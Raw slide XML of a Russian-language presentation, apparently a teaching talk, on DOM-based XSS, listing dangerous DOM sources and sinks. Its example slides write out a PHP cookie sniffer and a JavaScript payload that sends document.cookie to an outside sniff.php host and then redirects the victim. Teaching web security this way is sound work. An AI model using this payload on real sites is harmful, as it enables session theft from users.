            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Shape 194"/>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Причина возникновения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descr="2.JPG" id="200" name="Shape 200"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Shape 201"/>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DOM-модели</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Screenshot_1.jpg" id="203" name="Shape 203"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="959075" y="1113625"/>
            <a:ext cx="2580675" cy="1997225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="alert.png" id="204" name="Shape 204"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619300" y="1129575"/>
            <a:ext cx="4143701" cy="2277050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Screenshot_2.jpg" id="205" name="Shape 205"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2934225" y="2215900"/>
            <a:ext cx="2151475" cy="25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descr="2.JPG" id="210" name="Shape 210"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Shape 211"/>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Пример опасности DOM</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Shape 213"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="778900" y="1087800"/>
            <a:ext cx="7085700" cy="4563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AutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1800"/>
              <a:t>Написать какой-то </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1800"/>
              <a:t>сниффер</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9D9D9"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?php</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if (isset($_GET['cookie']))</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$text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of F Y h:i:s A');</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$text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n";</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$file = fopen("sniff.txt", "a");</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fwrite($file, $text);</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fclose($file);</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a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="D9D9D9"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9D9D9"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="D9D9D9"/>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descr="2.JPG" id="218" name="Shape 218"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Shape 219"/>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Пример опасности DOM</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221" name="Shape 221"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="778900" y="1087800"/>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1800"/>
              <a:t>2)   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1800"/>
              <a:t>Найти уязвимое место к скрипту</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t>	</a:t>
            </a:r>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img=new Image();</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img.src='http://sitename.ru/sniff.php?cookie='+document.cookie;</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function F() {</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location='http://www.solife.ru';</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9D9D9"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9D9D9"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>setTimeout(F, 5000);</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None/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="D9D9D9"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="D9D9D9"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>3)   Пользователь попадает на сайт с вредным скриптом  </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="222222"/>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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030575" y="155350"/>
            <a:ext cx="8168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Список опасных мест, вызывающие XSS</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="228" name="Shape 228"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Shape 229"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1786125" y="1867000"/>
            <a:ext cx="6305400" cy="10611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Clr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.URL</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.URLUnencoded</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.location (и его свойства)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.referrer</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.location (и его свойства)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030575" y="155350"/>
            <a:ext cx="8168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Список опасных функций, вызывающие XSS</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="236" name="Shape 236"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Shape 237"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724900" y="1004875"/>
            <a:ext cx="3854400" cy="106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ru" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1) Запись в HTML код страницы:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.write(…)</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document.writeln(…)</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document.body.innerHtml=…</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Shape 238"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710200" y="3976675"/>
            <a:ext cx="3659700" cy="1208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ru" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3) Открытие/модификация объекта window:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.open(…)</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window.open(…)</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window.location.href=… (а также присвоение значения host и hostname объекта location)</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Shape 239"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724900" y="1954925"/>
            <a:ext cx="3290100" cy="1302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ru" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2) Изменение DOM напрямую (включая события DHTML):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.forms[0].action=… (и другие вариации)</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document.attachEvent(…)</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document.create…(…)</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document.execCommand(…)</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document.body. … (доступ к DOM через объект body)</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window.attachEvent(…)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Shape 240"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4794375" y="2308975"/>
            <a:ext cx="4404900" cy="1302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ru" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5) Изменение URL документа:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.location=… (а также присвоение значений href, host и hostname объекта location)</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document.location.hostname=…</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document.location.replace(…)</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document.location.assign(…)</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document.URL=…</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window.navigate(…)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Shape 241"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4794375" y="1004875"/>
            <a:ext cx="3585600" cy="1302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ru" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4) Выполнение скрипта напрямую:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval(…)</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window.execScript(…)</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window.setInterval(…)</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.setTimeout(…)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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="9537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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383775" y="160050"/>
            <a:ext cx="7650600" cy="470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3000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>О себе:</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Shape 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3166700" y="1379175"/>
            <a:ext cx="5798700" cy="36273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ru" sz="2400"/>
              <a:t>Святослав Логин</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
